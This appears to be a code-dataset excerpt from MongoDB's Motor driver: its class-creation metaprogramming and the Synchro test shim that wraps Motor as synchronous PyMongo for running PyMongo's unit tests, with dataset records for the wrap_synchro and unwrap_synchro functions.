# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals, absolute_import
"""Dynamic class-creation for Motor."""
import inspect
import functools
from pymongo.cursor import Cursor
_class_cache = {}
def unwrap_args_session(args):
return (
obj.delegate
if obj.__class__.__name__.endswith('MotorClientSession')
else obj
for obj in args)
def unwrap_kwargs_session(kwargs):
return {
key: (obj.delegate
if obj.__class__.__name__.endswith('MotorClientSession')
else obj)
for key, obj in kwargs.items()}
_coro_token = object()
def motor_coroutine(f):
"""Used by Motor classes to mark functions as coroutines.
create_class_with_framework will decorate the function with a framework-
specific coroutine decorator, like asyncio.coroutine or Tornado's
gen.coroutine.
You cannot return a value from a motor_coroutine, the syntax differences
between Tornado on Python 2 and asyncio with Python 3.5 are impossible to
bridge.
"""
f._is_motor_coroutine = _coro_token
return f
def coroutine_annotation(f):
"""In docs, annotate a function that returns a Future with 'coroutine'.
Unlike @motor_coroutine, this doesn't affect behavior.
"""
# Like:
# @coroutine_annotation
# def method(self):
#
f.coroutine_annotation = True
return f
class MotorAttributeFactory(object):
"""Used by Motor classes to mark attributes that delegate in some way to
PyMongo. At module import time, create_class_with_framework calls
create_attribute() for each attr to create the final class attribute.
"""
def __init__(self, doc=None):
self.doc = doc
def create_attribute(self, cls, attr_name):
raise NotImplementedError
class Async(MotorAttributeFactory):
def __init__(self, attr_name, doc=None):
"""A descriptor that wraps a PyMongo method, such as insert_one,
and returns an asynchronous version of the method that returns a Future.
:Parameters:
- `attr_name`: The name of the attribute on the PyMongo class, if
different from attribute on the Motor class
"""
super(Async, self).__init__(doc)
self.attr_name = attr_name
self.wrap_class = None
self.unwrap_class = None
def create_attribute(self, cls, attr_name):
name = self.attr_name or attr_name
method = getattr(cls.__delegate_class__, name)
return asynchronize(framework=cls._framework,
sync_method=method,
doc=self.doc,
wrap_class=self.wrap_class,
unwrap_class=self.unwrap_class)
def wrap(self, original_class):
self.wrap_class = original_class
return self
def unwrap(self, class_name):
self.unwrap_class = class_name
return self
class AsyncRead(Async):
def __init__(self, attr_name=None, doc=None):
"""A descriptor that wraps a PyMongo read method like find_one() that
returns a Future.
"""
Async.__init__(self, attr_name=attr_name, doc=doc)
class AsyncWrite(Async):
def __init__(self, attr_name=None, doc=None):
"""A descriptor that wraps a PyMongo write method like update() that
accepts getLastError options and returns a Future.
"""
Async.__init__(self, attr_name=attr_name, doc=doc)
class AsyncCommand(Async):
def __init__(self, attr_name=None, doc=None):
"""A descriptor that wraps a PyMongo command like copy_database() that
returns a Future and does not accept getLastError options.
"""
Async.__init__(self, attr_name=attr_name, doc=doc)
class ReadOnlyProperty(MotorAttributeFactory):
"""Creates a readonly attribute on the wrapped PyMongo object."""
def create_attribute(self, cls, attr_name):
def fget(obj):
return getattr(obj.delegate, attr_name)
if self.doc:
doc = self.doc
else:
doc = getattr(cls.__delegate_class__, attr_name).__doc__
if doc:
return property(fget=fget, doc=doc)
else:
return property(fget=fget)
class DelegateMethod(ReadOnlyProperty):
"""A method on the wrapped PyMongo object that does no I/O and can be called
synchronously"""
def __init__(self, doc=None):
ReadOnlyProperty.__init__(self, doc)
self.wrap_class = None
def wrap(self, original_class):
self.wrap_class = original_class
return self
def create_attribute(self, cls, attr_name):
if self.wrap_class is None:
return ReadOnlyProperty.create_attribute(self, cls, attr_name)
method = getattr(cls.__delegate_class__, attr_name)
original_class = self.wrap_class
@functools.wraps(method)
def wrapper(self_, *args, **kwargs):
result = method(self_.delegate, *args, **kwargs)
# Don't call isinstance(), not checking subclasses.
if result.__class__ == original_class:
# Delegate to the current object to wrap the result.
return self_.wrap(result)
else:
return result
if self.doc:
wrapper.__doc__ = self.doc
wrapper.is_wrap_method = True # For Synchro.
return wrapper
class MotorCursorChainingMethod(MotorAttributeFactory):
def create_attribute(self, cls, attr_name):
cursor_method = getattr(cls.__delegate_class__, attr_name)
@functools.wraps(cursor_method)
def return_clone(self, *args, **kwargs):
cursor_method(self.delegate, *args, **kwargs)
return self
# This is for the benefit of Synchro, and motor_extensions.py
return_clone.is_motorcursor_chaining_method = True
return_clone.pymongo_method_name = attr_name
if self.doc:
return_clone.__doc__ = self.doc
return return_clone
def create_class_with_framework(cls, framework, module_name):
motor_class_name = framework.CLASS_PREFIX + cls.__motor_class_name__
cache_key = (cls, motor_class_name, framework)
cached_class = _class_cache.get(cache_key)
if cached_class:
return cached_class
new_class = type(str(motor_class_name), cls.__bases__, cls.__dict__.copy())
new_class.__module__ = module_name
new_class._framework = framework
assert hasattr(new_class, '__delegate_class__')
# If we're constructing MotorClient from AgnosticClient, for example,
# the method resolution order is (AgnosticClient, AgnosticBase, object).
# Iterate over bases looking for attributes and coroutines that must be
# replaced with framework-specific ones.
for base in reversed(inspect.getmro(cls)):
# Turn attribute factories into real methods or descriptors.
for name, attr in base.__dict__.items():
if isinstance(attr, MotorAttributeFactory):
new_class_attr = attr.create_attribute(new_class, name)
setattr(new_class, name, new_class_attr)
elif getattr(attr, '_is_motor_coroutine', None) is _coro_token:
coro = framework.coroutine(attr)
del coro._is_motor_coroutine
coro.coroutine_annotation = True
setattr(new_class, name, coro)
_class_cache[cache_key] = new_class
return new_class
|
mongodb/motor | synchro/__init__.py | wrap_synchro | python | def wrap_synchro(fn):
@functools.wraps(fn)
def _wrap_synchro(*args, **kwargs):
motor_obj = fn(*args, **kwargs)
# Not all Motor classes appear here, only those we need to return
# from methods like map_reduce() or create_collection()
if isinstance(motor_obj, motor.MotorCollection):
client = MongoClient(delegate=motor_obj.database.client)
database = Database(client, motor_obj.database.name)
return Collection(database, motor_obj.name, delegate=motor_obj)
if isinstance(motor_obj, motor.motor_tornado.MotorClientSession):
return ClientSession(delegate=motor_obj)
if isinstance(motor_obj, _MotorTransactionContext):
return _SynchroTransactionContext(motor_obj)
if isinstance(motor_obj, motor.MotorDatabase):
client = MongoClient(delegate=motor_obj.client)
return Database(client, motor_obj.name, delegate=motor_obj)
if isinstance(motor_obj, motor.motor_tornado.MotorChangeStream):
return ChangeStream(motor_obj)
if isinstance(motor_obj, motor.motor_tornado.MotorLatentCommandCursor):
return CommandCursor(motor_obj)
if isinstance(motor_obj, motor.motor_tornado.MotorCommandCursor):
return CommandCursor(motor_obj)
if isinstance(motor_obj, _MotorRawBatchCommandCursor):
return CommandCursor(motor_obj)
if isinstance(motor_obj, motor.motor_tornado.MotorCursor):
return Cursor(motor_obj)
if isinstance(motor_obj, _MotorRawBatchCursor):
return Cursor(motor_obj)
if isinstance(motor_obj, motor.MotorGridIn):
return GridIn(None, delegate=motor_obj)
if isinstance(motor_obj, motor.MotorGridOut):
return GridOut(None, delegate=motor_obj)
if isinstance(motor_obj, motor.motor_tornado.MotorGridOutCursor):
return GridOutCursor(motor_obj)
else:
return motor_obj
return _wrap_synchro | If decorated Synchro function returns a Motor object, wrap in a Synchro
object. | train | https://github.com/mongodb/motor/blob/6af22720723bde7c78eb8cb126962cfbfc034b2c/synchro/__init__.py#L111-L153 | null | # Copyright 2012-2014 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals
"""Synchro, a fake synchronous PyMongo implementation built on top of Motor,
for the sole purpose of checking that Motor passes the same unittests as
PyMongo.
DO NOT USE THIS MODULE.
"""
import inspect
from tornado.ioloop import IOLoop
import motor
import motor.frameworks.tornado
import motor.motor_tornado
from motor.core import _MotorTransactionContext
from motor.metaprogramming import MotorAttributeFactory
# Make e.g. "from pymongo.errors import AutoReconnect" work. Note that
# importing * won't pick up underscore-prefixed attrs.
from gridfs.errors import *
from pymongo import *
from pymongo import (collation,
compression_support,
change_stream,
errors,
monotonic,
operations,
server_selectors,
server_type,
son_manipulator,
saslprep,
ssl_match_hostname,
ssl_support,
write_concern)
from pymongo.auth import _build_credentials_tuple
from pymongo.helpers import _check_command_response
from pymongo.change_stream import _NON_RESUMABLE_GETMORE_ERRORS
from pymongo.client_session import TransactionOptions
from pymongo.collation import *
from pymongo.common import *
from pymongo.common import _UUID_REPRESENTATIONS, _MAX_END_SESSIONS
from pymongo.compression_support import _HAVE_SNAPPY, _HAVE_ZLIB
from pymongo.cursor import *
from pymongo.cursor import _QUERY_OPTIONS
from pymongo.errors import *
from pymongo.message import (_COMMAND_OVERHEAD,
_CursorAddress,
_gen_find_command,
_maybe_add_read_preference)
from pymongo.monitor import *
from pymongo.monitoring import *
from pymongo.monitoring import _LISTENERS, _Listeners, _SENSITIVE_COMMANDS
from pymongo.monotonic import time
from pymongo.operations import *
from pymongo.pool import *
from pymongo.pool import _METADATA
from pymongo.periodic_executor import *
from pymongo.periodic_executor import _EXECUTORS
from pymongo.read_concern import *
from pymongo.read_preferences import *
from pymongo.read_preferences import _ServerMode
from pymongo.results import *
from pymongo.results import _WriteResult
from pymongo.server import *
from pymongo.server_selectors import *
from pymongo.settings import *
from pymongo.saslprep import *
from pymongo.ssl_support import *
from pymongo.son_manipulator import *
from pymongo.topology import *
from pymongo.topology_description import *
from pymongo.uri_parser import *
from pymongo.uri_parser import _partition, _rpartition, _HAVE_DNSPYTHON
from pymongo.write_concern import *
from pymongo import auth
from pymongo.auth import *
from pymongo.auth import _password_digest
from gridfs.grid_file import DEFAULT_CHUNK_SIZE, _SEEK_CUR, _SEEK_END
from pymongo import GEOSPHERE, HASHED
from pymongo.pool import SocketInfo, Pool
# Internal classes not declared in motor_tornado.py: retrieve from class cache.
from motor.core import (
AgnosticRawBatchCursor as _AgnosticRawBatchCursor,
AgnosticRawBatchCommandCursor as _AgnosticRawBatchCommandCursor)
from motor.motor_tornado import create_motor_class
_MotorRawBatchCursor = create_motor_class(
_AgnosticRawBatchCursor)
_MotorRawBatchCommandCursor = create_motor_class(
_AgnosticRawBatchCommandCursor)
def unwrap_synchro(fn):
"""Unwrap Synchro objects passed to a method and pass Motor objects instead.
"""
@functools.wraps(fn)
def _unwrap_synchro(*args, **kwargs):
def _unwrap_obj(obj):
if isinstance(obj, Synchro):
return obj.delegate
else:
return obj
args = [_unwrap_obj(arg) for arg in args]
kwargs = dict([
(key, _unwrap_obj(value)) for key, value in kwargs.items()])
return fn(*args, **kwargs)
return _unwrap_synchro
class SynchroAttr(object):
# Name can be set by SynchroMeta if Sync() is used directly in class defn.
def __init__(self, name=None):
self.name = name
class Sync(SynchroAttr):
def __get__(self, obj, objtype):
async_method = getattr(obj.delegate, self.name)
return wrap_synchro(unwrap_synchro(obj.synchronize(async_method)))
class WrapOutgoing(SynchroAttr):
def __get__(self, obj, objtype):
# self.name is set by SynchroMeta.
name = self.name
def synchro_method(*args, **kwargs):
motor_method = getattr(obj.delegate, name)
return wrap_synchro(unwrap_synchro(motor_method))(*args, **kwargs)
return synchro_method
class SynchroProperty(SynchroAttr):
"""Used to fake private properties like MongoClient.__member - don't use
for real properties like write_concern or you'll mask missing features in
Motor!
"""
def __get__(self, obj, objtype):
# self.name is set by SynchroMeta.
return getattr(obj.delegate.delegate, self.name)
def __set__(self, obj, val):
# self.name is set by SynchroMeta.
return setattr(obj.delegate.delegate, self.name, val)
def wrap_outgoing(delegate_attr):
for decoration in ('is_motorcursor_chaining_method',
'is_wrap_method'):
if getattr(delegate_attr, decoration, False):
return True
return False
class SynchroMeta(type):
"""This metaclass customizes creation of Synchro's MongoClient, Database,
etc., classes:
- All asynchronized methods of Motor classes, such as
MotorDatabase.command(), are re-synchronized.
- Properties delegated from Motor's classes to PyMongo's, such as ``name``
or ``host``, are delegated **again** from Synchro's class to Motor's.
- Motor methods which return Motor class instances are wrapped to return
Synchro class instances.
- Certain internals accessed by PyMongo's unittests, such as _Cursor__data,
are delegated from Synchro directly to PyMongo.
"""
def __new__(cls, name, bases, attrs):
# Create the class, e.g. the Synchro MongoClient or Database class.
new_class = type.__new__(cls, name, bases, attrs)
# delegate_class is a Motor class like MotorClient.
delegate_class = new_class.__delegate_class__
if delegate_class:
delegated_attrs = {}
for klass in reversed(inspect.getmro(delegate_class)):
delegated_attrs.update(klass.__dict__)
for attrname, delegate_attr in delegated_attrs.items():
# If attrname is in attrs, it means Synchro has overridden
# this attribute, e.g. Collection.aggregate which is
# special-cased. Ignore such attrs.
if attrname in attrs:
continue
if getattr(delegate_attr, 'is_async_method', False):
# Re-synchronize the method.
setattr(new_class, attrname, Sync(attrname))
elif wrap_outgoing(delegate_attr):
# Wrap Motor objects in Synchro objects.
wrapper = WrapOutgoing()
wrapper.name = attrname
setattr(new_class, attrname, wrapper)
elif isinstance(delegate_attr, property):
# Delegate the property from Synchro to Motor.
setattr(new_class, attrname, delegate_attr)
# Set DelegateProperties' and SynchroProperties' names.
for name, attr in attrs.items():
if isinstance(attr, (MotorAttributeFactory, SynchroAttr)):
if attr.name is None:
attr.name = name
return new_class
class Synchro(object):
"""
Wraps a MotorClient, MotorDatabase, MotorCollection, etc. and
makes it act like the synchronous pymongo equivalent
"""
__metaclass__ = SynchroMeta
__delegate_class__ = None
def __cmp__(self, other):
return cmp(self.delegate, other.delegate)
def synchronize(self, async_method):
"""
@param async_method: Bound method of a MotorClient, MotorDatabase, etc.
@return: A synchronous wrapper around the method
"""
@functools.wraps(async_method)
def synchronized_method(*args, **kwargs):
@functools.wraps(async_method)
def partial():
return async_method(*args, **kwargs)
return IOLoop.current().run_sync(partial)
return synchronized_method
class MongoClient(Synchro):
__delegate_class__ = motor.MotorClient
HOST = 'localhost'
PORT = 27017
_cache_credentials = SynchroProperty()
get_database = WrapOutgoing()
max_pool_size = SynchroProperty()
max_write_batch_size = SynchroProperty()
start_session = Sync()
def __init__(self, host=None, port=None, *args, **kwargs):
# So that TestClient.test_constants and test_types work.
host = host if host is not None else MongoClient.HOST
port = port if port is not None else MongoClient.PORT
self.delegate = kwargs.pop('delegate', None)
# Motor passes connect=False by default.
kwargs.setdefault('connect', True)
if not self.delegate:
self.delegate = self.__delegate_class__(host, port, *args, **kwargs)
@property
def is_locked(self):
# MotorClient doesn't support the is_locked property.
# Synchro has already synchronized current_op; use it.
result = self.admin.current_op()
return bool(result.get('fsyncLock', None))
def __enter__(self):
return self
def __exit__(self, *args):
self.delegate.close()
def __getattr__(self, name):
return Database(self, name, delegate=getattr(self.delegate, name))
def __getitem__(self, name):
return Database(self, name, delegate=self.delegate[name])
_MongoClient__all_credentials = SynchroProperty()
_MongoClient__options = SynchroProperty()
_get_topology = SynchroProperty()
_topology = SynchroProperty()
_kill_cursors_executor = SynchroProperty()
class _SynchroTransactionContext(Synchro):
def __init__(self, delegate):
self.delegate = delegate
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.synchronize(self.delegate._session.end_session)()
class ClientSession(Synchro):
__delegate_class__ = motor.motor_tornado.MotorClientSession
start_transaction = WrapOutgoing()
client = SynchroProperty()
def __init__(self, delegate):
self.delegate = delegate
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.synchronize(self.delegate.end_session)
_client = SynchroProperty()
_in_transaction = SynchroProperty()
_server_session = SynchroProperty()
_transaction_id = SynchroProperty()
_txn_read_preference = SynchroProperty()
class Database(Synchro):
__delegate_class__ = motor.MotorDatabase
get_collection = WrapOutgoing()
def __init__(self, client, name, **kwargs):
assert isinstance(client, MongoClient), (
"Expected MongoClient, got %s"
% repr(client))
self._client = client
self.delegate = kwargs.get('delegate') or motor.MotorDatabase(
client.delegate, name, **kwargs)
assert isinstance(self.delegate, motor.MotorDatabase), (
"synchro.Database delegate must be MotorDatabase, not "
" %s" % repr(self.delegate))
@property
def client(self):
return self._client
def __getattr__(self, name):
return Collection(self, name, delegate=getattr(self.delegate, name))
def __getitem__(self, name):
return Collection(self, name, delegate=self.delegate[name])
class Collection(Synchro):
__delegate_class__ = motor.MotorCollection
find = WrapOutgoing()
find_raw_batches = WrapOutgoing()
list_indexes = WrapOutgoing()
watch = WrapOutgoing()
def __init__(self, database, name, **kwargs):
if not isinstance(database, Database):
raise TypeError(
"First argument to synchro Collection must be synchro "
"Database, not %s" % repr(database))
self.database = database
self.delegate = kwargs.get('delegate') or motor.MotorCollection(
self.database.delegate, name, **kwargs)
if not isinstance(self.delegate, motor.MotorCollection):
raise TypeError(
"Expected to get synchro Collection from Database,"
" got %s" % repr(self.delegate))
def aggregate(self, *args, **kwargs):
# Motor does no I/O initially in aggregate() but PyMongo does.
func = wrap_synchro(unwrap_synchro(self.delegate.aggregate))
cursor = func(*args, **kwargs)
self.synchronize(cursor.delegate._get_more)()
return cursor
def aggregate_raw_batches(self, *args, **kwargs):
# Motor does no I/O initially in aggregate() but PyMongo does.
func = wrap_synchro(unwrap_synchro(self.delegate.aggregate_raw_batches))
cursor = func(*args, **kwargs)
self.synchronize(cursor.delegate._get_more)()
return cursor
def __getattr__(self, name):
# Access to collections with dotted names, like db.test.mike
fullname = self.name + '.' + name
return Collection(self.database, fullname,
delegate=getattr(self.delegate, name))
def __getitem__(self, name):
# Access to collections with dotted names, like db.test['mike']
fullname = self.name + '.' + name
return Collection(self.database, fullname,
delegate=self.delegate[name])
class ChangeStream(Synchro):
__delegate_class__ = motor.motor_tornado.MotorChangeStream
next = Sync('next')
close = Sync('close')
def __init__(self, motor_change_stream):
self.delegate = motor_change_stream
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
class Cursor(Synchro):
__delegate_class__ = motor.motor_tornado.MotorCursor
batch_size = WrapOutgoing()
rewind = WrapOutgoing()
clone = WrapOutgoing()
close = Sync('close')
def __init__(self, motor_cursor):
self.delegate = motor_cursor
def __iter__(self):
return self
# These are special cases, they need to be accessed on the class, not just
# on instances.
@wrap_synchro
def __copy__(self):
return self.delegate.__copy__()
@wrap_synchro
def __deepcopy__(self, memo):
return self.delegate.__deepcopy__(memo)
def next(self):
cursor = self.delegate
if cursor._buffer_size():
return cursor.next_object()
elif cursor.alive:
self.synchronize(cursor._get_more)()
if cursor._buffer_size():
return cursor.next_object()
raise StopIteration
def __getitem__(self, index):
if isinstance(index, slice):
return Cursor(self.delegate[index])
else:
to_list = self.synchronize(self.delegate[index].to_list)
return to_list(length=10000)[0]
@property
@wrap_synchro
def collection(self):
return self.delegate.collection
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
# Don't suppress exceptions.
return False
# For PyMongo tests that access cursor internals.
_Cursor__data = SynchroProperty()
_Cursor__exhaust = SynchroProperty()
_Cursor__max_await_time_ms = SynchroProperty()
_Cursor__max_time_ms = SynchroProperty()
_Cursor__query_flags = SynchroProperty()
_Cursor__query_spec = SynchroProperty()
_Cursor__retrieved = SynchroProperty()
_Cursor__spec = SynchroProperty()
_read_preference = SynchroProperty()
class CommandCursor(Cursor):
__delegate_class__ = motor.motor_tornado.MotorCommandCursor
class GridOutCursor(Cursor):
__delegate_class__ = motor.motor_tornado.MotorGridOutCursor
def __init__(self, delegate):
if not isinstance(delegate, motor.motor_tornado.MotorGridOutCursor):
raise TypeError(
"Expected MotorGridOutCursor, got %r" % delegate)
self.delegate = delegate
def next(self):
motor_grid_out = super(GridOutCursor, self).next()
if motor_grid_out:
return GridOut(self.collection, delegate=motor_grid_out)
__next__ = next
class CursorManager(object):
# Motor doesn't support cursor managers, just avoid ImportError.
pass
class BulkOperationBuilder(object):
pass
class GridFSBucket(Synchro):
__delegate_class__ = motor.MotorGridFSBucket
def __init__(self, database, bucket_name='fs', disable_md5=False):
if not isinstance(database, Database):
raise TypeError(
"Expected Database, got %s" % repr(database))
self.delegate = motor.MotorGridFSBucket(
database.delegate, bucket_name, disable_md5)
def find(self, *args, **kwargs):
motor_method = self.delegate.find
unwrapping_method = wrap_synchro(unwrap_synchro(motor_method))
return unwrapping_method(*args, **kwargs)
class GridIn(Synchro):
__delegate_class__ = motor.MotorGridIn
def __init__(self, collection, **kwargs):
"""Can be created with collection and kwargs like a PyMongo GridIn,
or with a 'delegate' keyword arg, where delegate is a MotorGridIn.
"""
delegate = kwargs.pop('delegate', None)
if delegate:
self.delegate = delegate
else:
if not isinstance(collection, Collection):
raise TypeError(
"Expected Collection, got %s" % repr(collection))
self.delegate = motor.MotorGridIn(collection.delegate, **kwargs)
def __getattr__(self, item):
return getattr(self.delegate, item)
class SynchroGridOutProperty(object):
def __init__(self, name):
self.name = name
def __get__(self, obj, objtype):
obj.synchronize(obj.delegate.open)()
return getattr(obj.delegate, self.name)
class GridOut(Synchro):
__delegate_class__ = motor.MotorGridOut
_id = SynchroGridOutProperty('_id')
aliases = SynchroGridOutProperty('aliases')
chunk_size = SynchroGridOutProperty('chunk_size')
close = SynchroGridOutProperty('close')
content_type = SynchroGridOutProperty('content_type')
filename = SynchroGridOutProperty('filename')
length = SynchroGridOutProperty('length')
md5 = SynchroGridOutProperty('md5')
metadata = SynchroGridOutProperty('metadata')
name = SynchroGridOutProperty('name')
upload_date = SynchroGridOutProperty('upload_date')
def __init__(
self, root_collection, file_id=None, file_document=None,
delegate=None):
"""Can be created with collection and kwargs like a PyMongo GridOut,
or with a 'delegate' keyword arg, where delegate is a MotorGridOut.
"""
if delegate:
self.delegate = delegate
else:
if not isinstance(root_collection, Collection):
raise TypeError(
"Expected Collection, got %s" % repr(root_collection))
self.delegate = motor.MotorGridOut(
root_collection.delegate, file_id, file_document)
def __getattr__(self, item):
self.synchronize(self.delegate.open)()
return getattr(self.delegate, item)
def __setattr__(self, key, value):
# PyMongo's GridOut prohibits setting these values; do the same
# to make PyMongo's assertRaises tests pass.
if key in (
"_id", "name", "content_type", "length", "chunk_size",
"upload_date", "aliases", "metadata", "md5"):
raise AttributeError()
super(GridOut, self).__setattr__(key, value)
class TimeModule(object):
"""Fake time module so time.sleep() lets other tasks run on the IOLoop.
See e.g. test_schedule_refresh() in test_replica_set_client.py.
"""
def __getattr__(self, item):
def sleep(seconds):
loop = IOLoop.current()
loop.add_timeout(time.time() + seconds, loop.stop)
loop.start()
if item == 'sleep':
return sleep
else:
return getattr(time, item)
|
mongodb/motor | synchro/__init__.py | unwrap_synchro | python | def unwrap_synchro(fn):
@functools.wraps(fn)
def _unwrap_synchro(*args, **kwargs):
def _unwrap_obj(obj):
if isinstance(obj, Synchro):
return obj.delegate
else:
return obj
args = [_unwrap_obj(arg) for arg in args]
kwargs = dict([
(key, _unwrap_obj(value)) for key, value in kwargs.items()])
return fn(*args, **kwargs)
return _unwrap_synchro | Unwrap Synchro objects passed to a method and pass Motor objects instead. | train | https://github.com/mongodb/motor/blob/6af22720723bde7c78eb8cb126962cfbfc034b2c/synchro/__init__.py#L156-L171 | null | # Copyright 2012-2014 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals
"""Synchro, a fake synchronous PyMongo implementation built on top of Motor,
for the sole purpose of checking that Motor passes the same unittests as
PyMongo.
DO NOT USE THIS MODULE.
"""
import inspect
from tornado.ioloop import IOLoop
import motor
import motor.frameworks.tornado
import motor.motor_tornado
from motor.core import _MotorTransactionContext
from motor.metaprogramming import MotorAttributeFactory
# Make e.g. "from pymongo.errors import AutoReconnect" work. Note that
# importing * won't pick up underscore-prefixed attrs.
from gridfs.errors import *
from pymongo import *
from pymongo import (collation,
compression_support,
change_stream,
errors,
monotonic,
operations,
server_selectors,
server_type,
son_manipulator,
saslprep,
ssl_match_hostname,
ssl_support,
write_concern)
from pymongo.auth import _build_credentials_tuple
from pymongo.helpers import _check_command_response
from pymongo.change_stream import _NON_RESUMABLE_GETMORE_ERRORS
from pymongo.client_session import TransactionOptions
from pymongo.collation import *
from pymongo.common import *
from pymongo.common import _UUID_REPRESENTATIONS, _MAX_END_SESSIONS
from pymongo.compression_support import _HAVE_SNAPPY, _HAVE_ZLIB
from pymongo.cursor import *
from pymongo.cursor import _QUERY_OPTIONS
from pymongo.errors import *
from pymongo.message import (_COMMAND_OVERHEAD,
_CursorAddress,
_gen_find_command,
_maybe_add_read_preference)
from pymongo.monitor import *
from pymongo.monitoring import *
from pymongo.monitoring import _LISTENERS, _Listeners, _SENSITIVE_COMMANDS
from pymongo.monotonic import time
from pymongo.operations import *
from pymongo.pool import *
from pymongo.pool import _METADATA
from pymongo.periodic_executor import *
from pymongo.periodic_executor import _EXECUTORS
from pymongo.read_concern import *
from pymongo.read_preferences import *
from pymongo.read_preferences import _ServerMode
from pymongo.results import *
from pymongo.results import _WriteResult
from pymongo.server import *
from pymongo.server_selectors import *
from pymongo.settings import *
from pymongo.saslprep import *
from pymongo.ssl_support import *
from pymongo.son_manipulator import *
from pymongo.topology import *
from pymongo.topology_description import *
from pymongo.uri_parser import *
from pymongo.uri_parser import _partition, _rpartition, _HAVE_DNSPYTHON
from pymongo.write_concern import *
from pymongo import auth
from pymongo.auth import *
from pymongo.auth import _password_digest
from gridfs.grid_file import DEFAULT_CHUNK_SIZE, _SEEK_CUR, _SEEK_END
from pymongo import GEOSPHERE, HASHED
from pymongo.pool import SocketInfo, Pool
# Internal classes not declared in motor_tornado.py: retrieve from class cache.
from motor.core import (
AgnosticRawBatchCursor as _AgnosticRawBatchCursor,
AgnosticRawBatchCommandCursor as _AgnosticRawBatchCommandCursor)
from motor.motor_tornado import create_motor_class
_MotorRawBatchCursor = create_motor_class(
_AgnosticRawBatchCursor)
_MotorRawBatchCommandCursor = create_motor_class(
_AgnosticRawBatchCommandCursor)
def wrap_synchro(fn):
"""If decorated Synchro function returns a Motor object, wrap in a Synchro
object.
"""
@functools.wraps(fn)
def _wrap_synchro(*args, **kwargs):
motor_obj = fn(*args, **kwargs)
# Not all Motor classes appear here, only those we need to return
# from methods like map_reduce() or create_collection()
if isinstance(motor_obj, motor.MotorCollection):
client = MongoClient(delegate=motor_obj.database.client)
database = Database(client, motor_obj.database.name)
return Collection(database, motor_obj.name, delegate=motor_obj)
if isinstance(motor_obj, motor.motor_tornado.MotorClientSession):
return ClientSession(delegate=motor_obj)
if isinstance(motor_obj, _MotorTransactionContext):
return _SynchroTransactionContext(motor_obj)
if isinstance(motor_obj, motor.MotorDatabase):
client = MongoClient(delegate=motor_obj.client)
return Database(client, motor_obj.name, delegate=motor_obj)
if isinstance(motor_obj, motor.motor_tornado.MotorChangeStream):
return ChangeStream(motor_obj)
if isinstance(motor_obj, motor.motor_tornado.MotorLatentCommandCursor):
return CommandCursor(motor_obj)
if isinstance(motor_obj, motor.motor_tornado.MotorCommandCursor):
return CommandCursor(motor_obj)
if isinstance(motor_obj, _MotorRawBatchCommandCursor):
return CommandCursor(motor_obj)
if isinstance(motor_obj, motor.motor_tornado.MotorCursor):
return Cursor(motor_obj)
if isinstance(motor_obj, _MotorRawBatchCursor):
return Cursor(motor_obj)
if isinstance(motor_obj, motor.MotorGridIn):
return GridIn(None, delegate=motor_obj)
if isinstance(motor_obj, motor.MotorGridOut):
return GridOut(None, delegate=motor_obj)
if isinstance(motor_obj, motor.motor_tornado.MotorGridOutCursor):
return GridOutCursor(motor_obj)
else:
return motor_obj
return _wrap_synchro
class SynchroAttr(object):
# Name can be set by SynchroMeta if Sync() is used directly in class defn.
def __init__(self, name=None):
self.name = name
class Sync(SynchroAttr):
def __get__(self, obj, objtype):
async_method = getattr(obj.delegate, self.name)
return wrap_synchro(unwrap_synchro(obj.synchronize(async_method)))
class WrapOutgoing(SynchroAttr):
def __get__(self, obj, objtype):
# self.name is set by SynchroMeta.
name = self.name
def synchro_method(*args, **kwargs):
motor_method = getattr(obj.delegate, name)
return wrap_synchro(unwrap_synchro(motor_method))(*args, **kwargs)
return synchro_method
class SynchroProperty(SynchroAttr):
"""Used to fake private properties like MongoClient.__member - don't use
for real properties like write_concern or you'll mask missing features in
Motor!
"""
def __get__(self, obj, objtype):
# self.name is set by SynchroMeta.
return getattr(obj.delegate.delegate, self.name)
def __set__(self, obj, val):
# self.name is set by SynchroMeta.
return setattr(obj.delegate.delegate, self.name, val)
def wrap_outgoing(delegate_attr):
for decoration in ('is_motorcursor_chaining_method',
'is_wrap_method'):
if getattr(delegate_attr, decoration, False):
return True
return False
class SynchroMeta(type):
"""This metaclass customizes creation of Synchro's MongoClient, Database,
etc., classes:
- All asynchronized methods of Motor classes, such as
MotorDatabase.command(), are re-synchronized.
- Properties delegated from Motor's classes to PyMongo's, such as ``name``
or ``host``, are delegated **again** from Synchro's class to Motor's.
- Motor methods which return Motor class instances are wrapped to return
Synchro class instances.
- Certain internals accessed by PyMongo's unittests, such as _Cursor__data,
are delegated from Synchro directly to PyMongo.
"""
def __new__(cls, name, bases, attrs):
# Create the class, e.g. the Synchro MongoClient or Database class.
new_class = type.__new__(cls, name, bases, attrs)
# delegate_class is a Motor class like MotorClient.
delegate_class = new_class.__delegate_class__
if delegate_class:
delegated_attrs = {}
for klass in reversed(inspect.getmro(delegate_class)):
delegated_attrs.update(klass.__dict__)
for attrname, delegate_attr in delegated_attrs.items():
# If attrname is in attrs, it means Synchro has overridden
# this attribute, e.g. Collection.aggregate which is
# special-cased. Ignore such attrs.
if attrname in attrs:
continue
if getattr(delegate_attr, 'is_async_method', False):
# Re-synchronize the method.
setattr(new_class, attrname, Sync(attrname))
elif wrap_outgoing(delegate_attr):
# Wrap Motor objects in Synchro objects.
